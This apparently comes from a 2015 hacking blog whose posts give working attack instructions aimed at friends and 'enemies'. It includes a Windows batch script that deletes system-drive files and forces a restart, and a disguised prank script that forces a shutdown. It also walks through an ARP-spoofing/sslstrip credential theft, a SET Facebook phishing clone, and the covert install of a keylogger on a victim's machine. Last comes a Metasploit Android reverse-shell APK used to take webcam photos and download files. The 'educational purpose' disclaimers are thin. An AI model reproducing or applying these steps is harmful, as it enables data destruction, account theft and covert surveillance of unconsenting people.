Friday 10 April 2015

VIRUSES

Hey guys, today I am going to show you some of the viruses. Which does some cool functions.
I have used more than 100 viruses using notepad. But Microsoft updated the windows and Most of the viruses are not working for windows 8.1 and above system.

Here are the some virus codes. Which make prank your friends.
You can use these codes. These codes will not affect your system.
It's just Prank.

BE CAREFUL, THE FIRST, SECOND AND THIRD VIRUSES ARE NOT A DANGER BUT  DON'T USE FOURTH VIRUS. IT WILL DELETE THE FILES FROM YOUR COMPUTER.

FOURTH VIRUS IS ONLY FOR MAKE REVENGE YOUR ENEMIES.

                                                            VIRUS 1

Copy these codes and paste it over the notepad and give the extension called .bat



cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep
echo Wscript.Sleep 5000>C:sleep5000.vbs
echo Wscript.Sleep 3000>C:sleep3000.vbs
echo Wscript.Sleep 4000>C:sleep4000.vbs
echo Wscript.Sleep 2000>C:sleep2000.vbs
cd %systemroot%System32
dir
cls
start /w wscript.exe C:sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:sleep3000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Deleting Root Partition…
start /w wscript.exe C:sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x…
cd C:Documents and SettingsAll UsersStart MenuPrograms
mkdir h4x
start /w wscript.exe C:sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1…
start /w wscript.exe C:sleep3000.vbs
echo cd C:Documents and SettingsAll UsersStart MenuProgramsStartuph4x
echo start hax.exe
start /w wscript.exe C:sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:sleep2000.vbs
pause
shutdown -s -t 10 -c “Your computer has committed suicide. Have a nice day.”



     Save as to the Desktop and right click-> create shortcut->
     Now right click shortcut-> properties-> change icon.

send this virus to your friends and have fun. It looks


That's it guys.


                                                                VIRUS 2

This virus has a simple command, but does big work.
 Which opens a command prompt continuously.  Approximately it opens more than 1000 times. You can't handle it. There is only one option to get your system to normal( Direct Power off).

Copy these codes and paste it over the notepad and give the extension called .bat


@echo off
:a
Start
Start
Start
Start
Start
Start
goto :a


This will look like.


 Save as to the Desktop and right click-> create shortcut->
  Now right click shortcut-> properties-> change icon.

send this virus to your friends and have fun.


                                                                    VIRUS 3

If you want to know your system GENDER.(Male/Female)
This one is a funny virus Code.
Copy these codes and paste it over the notepad and give the extension called .bat



CreateObject("SAPI.SpVoice").Speak"I love YOU"



Save as to the Desktop and right click-> create shortcut->
  Now right click shortcut-> properties-> change icon.

send this virus to your friends and have fun.



                                                                        VIRUS 4


This one is Danger so don't use this on your own system. This will delete the system files from the windows.
If you want to take revenge of your friend. Use this Virus.
Copy these codes and paste it over the notepad and give the extension called .bat



@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00



Save as to the Desktop and right click-> create shortcut->
  Now right click shortcut-> properties-> change icon.

send this virus to your friends and have fun.
Now game over.

Enjoy friends!!!




Thursday 9 April 2015

MAN-IN-THE-MIDDLE ATTACK

Hey guys, today I am going to show you man-in-the-middle attack (MITMA). This is the best method to hack someones account. You can hack any accounts like GOOGLE, FACEBOOK,TWITTER, YAHOO, etc.. Even if that is secured you can Hack easily.  

REQUIRENMENT:

1. Kali Linux (I am using Kali Linux 1.1.0 )
2. Internet connection.

I am just going to Hack one of my friend's particular system. You guys can see google, Facebook and other social networking websites are "https://". It means website more secure.
Now i am going to Attack that system by using sslstrip.

Step 1: Open Kali Linux and Open terminal by right clicking mouse.
  And search IP address of the Host machine.
"ifconfig"
Mine is 192.168.0.105.


Now you can get an idea what I am going to do.



Open the terminal and type the following commands. I am going to forward the IP.
Type

"echo 1 > /proc/sys/net/ipv4/ip_forward"
You can see the picture below and follow the commands.

"iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080".


Now check the Default gateway of the network. We are going to Attack the Default gateway and steal data. My default Gateway is 192.168.0.1.
"route -n"


Now check what are the Device Networks are available by scanning network.
Using nmap, it scans the entire network and gives the open ports of that each and every network. Type this command

"nmap -sS -O 192.168.0.1/24 "
I am going to Attack victim machine 192.168.0.102.





Now type the following commands without any mistake.

arpspoof -i eth0 -t <Victim IP>  <Default gateway> )

"arpspoof -i eth0 -t 192.168.0.102 192.168.0.1"





The package is Loading and Open a new terminal and type
 I am using port number 8080.

"sslstrip -l 8080"

It's done guys. We hacked successfully.
If the victim did anything, it will show on your window. Let's see some examples.
All the secure networks are now unsecured. "https://" are converted into "http://". You can see.
Type cat for reading the file and type log file name.
Type the following commands

"cat sslstrip.log"





We got the username and password.
And also see one more example.
By hacking Google.


You can see all the secured websites are now unsecured.
(http://)


That's it guys.
Enjoy!!

This only for Educational purpose. I am not responsible for
 any of the illegal activities.

HACK FACEBOOK ACCOUNT BY USING BACKTRACK 5 r3

Hey guys, today I am going to show you how to Hack Facebook Account of your friend.  I am using BackTrack 5 for this process. I don't want to give any description for this.
I am going to tell you a trick by which you can hack FACEBOOK, GMAIL, TWITTER, YAHOO, etc.

START

Step 1: Open BackTrack 5 and, open terminal. Type "ifconfig " to check the IP address of Host computer.



 Step 2: Now open  BackTrack-> Exploitation Tools-> Social Engineering Tools-> Social Engineering Toolkit-> SET.
 Type "1" for Social-Engineering Attacks and Hit Enter.



Type "2" for Website Attack Vectors and hit Enter.



Type "3" for Credential Harvester Attack Method and Hit Enter.




Now Type "2" for Site Cloner and Hit Enter.




After That provide the Host computer IP address. (Mine is 192.168.0.102). You guys give your Host computer IP Address and hit Enter.
Next Type the clone website you want to use. I am using FACEBOOK (http://www.facebook.com).
and hit Enter.




Now Open Browser and go to tinyurl. Paste the Host IP address over there and it will provide the link for that IP.




Send that link to your friends and Wait till they login. We can't do anything until they get a login.
After they login you will get their Username and Password.





That's it guys.
Enjoy!!.


KEYLOGGER

Keyloggers or keystroke loggers are software programs or hardware devices that track the activities (keys pressed) of a keyboard.Keyloggers are a form of spyware where the user of the computer is unaware their actions are being tracked. Keyloggers can be used for a variety of purposes; hackers may use them to maliciously gain access to your private information while employers might use them to monitor employee activities. Some keyloggers can also capture your screen at random intervals, these are known as screen recorders. Keylogger software typically stores your keystrokes in a small file which is either accessed later or automatically emailed to the person monitoring your actions.

We all have interest to access someones social networking and their personal information..
I am going to show you one of the best tools called Golden Keylogger.
For college students this is most helpful for knowing someones email id and passwords.
Keep in mind Using someones Account without their permission is CYBERCRIME.

This is only for Educational purpose.

Install the Keylogger on the victim machine. 

It shows each and every letter which is written by the victim. After they used the computer. You can go and check it out. What they did on this machine.


This keylogger give lots of options. Also you can hide the icon and change the setting as you want.



You can provide passwords and also the advanced setting provides a lot of shortcuts.


View the log by right click on the keylogger icon.



Now you can see all the letters which have been written by the victim. 

That's it guys.
Enjoy it.
You can Download the tool from here.

I am recommending Family Keylogger. Use this.

This is only for educational purpose..I am not responsible for any of the illegal activities.

Wednesday 8 April 2015

ACCESS BLOCKED WEBSITES

This is a very useful trick specially for school and college students as many websites are blocked in colleges. This is a very famous and easy to implement method by proxy websites.
There are many proxy websites which can be used to access blocked websites.










Simply open the links and enter the url of the blocked websites and enjoy.
Else you can add the extension for Google chrome called Hola Better Internet.
Make sure the icon is changed. Here it shows United States Flag. 

Now you can use Facebook, Twitter and other social networking websites on college and school. enjoy guys bye.

HACK ANDROID USING METASPLOIT KALI LINUX

 Metasploit has released android meterpreter too for exploitation so in this tutorial i will show you that how to use an android meterpreter payload to hack into an android device.

REQUIREMENTS:
1. Metasploit Framework (I am using Kali Linux 1.1.0 ) .
2.Any Android smartphone.

Attacker IP address: 192.168.0.103 (by typing "ifconfig" on kali linux terminal).
Attacker Port no to receive connection:8080 (you can use port 443 or something else).

START:
Step 1: Open terminal and type "ifconfig". to get the Attacker IP address.
Step 2: Open second terminal by clicking (Ctrl+Shift+t). Android phones only supports .apk files.        So  we have to make an .apk file. After that we have to upload that to that Apache server. Redirect the .apk file to the  /var/www/  specific directory.
 Now type following commands
"msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=8080 R > /var/www/lolipop.apk"


Step 3: Open third terminal by clicking (Ctrl+Shift+t). I am going to dump this .apk file to the  Apache2 server. So we have to start the apache2 server by typing

  "apache2 start"
  "service apache2 start"




Step 4: Open Forth terminal by clicking (Ctrl+Shift+t). we going to exploit the device. So 
 start Metasploit Framework.

"msfconsole"   (wait a few minute.it takes sometime to get start)

"use multi/handler"
"set payload android/meterpreter/reverse_tcp"
"set lhost 192.168.0.103"
"set lport 8080"
"exploit"
 Send the link to your friends. (like <your ip address>/<.apk file name>).. Mine is "192.168.0.103/lolipop.apk" 

after they installed the .apk file the exploitation starts.
Now Type the following commands to know what we can do with this.
"help"   (it shows all the possible things we do with the metasploit)
you can see all the Android commands over here.

we can get access the smartphone remotely .
get access camera by

"webcam_list"
"webcam_snap 1"
It snaps the pic and send to the attacker.

Now steal the data from the Device.
get enter to the sdcard.
"cd /sdcard/"
"ls"
You can see all the Folders which are presented in the Android device.
i am going to steal the camera picture.
"cd /sdcard/DCIM"
"ls"
"cd /sdcard/DCIM/Camera"
"ls"

Now Steal the data. Type
"download <file name which we want to sownload>"

Thats it guys..
 enjoy it.

This is only for Educational Purpose only. I am not responsible for any of the illegal activities..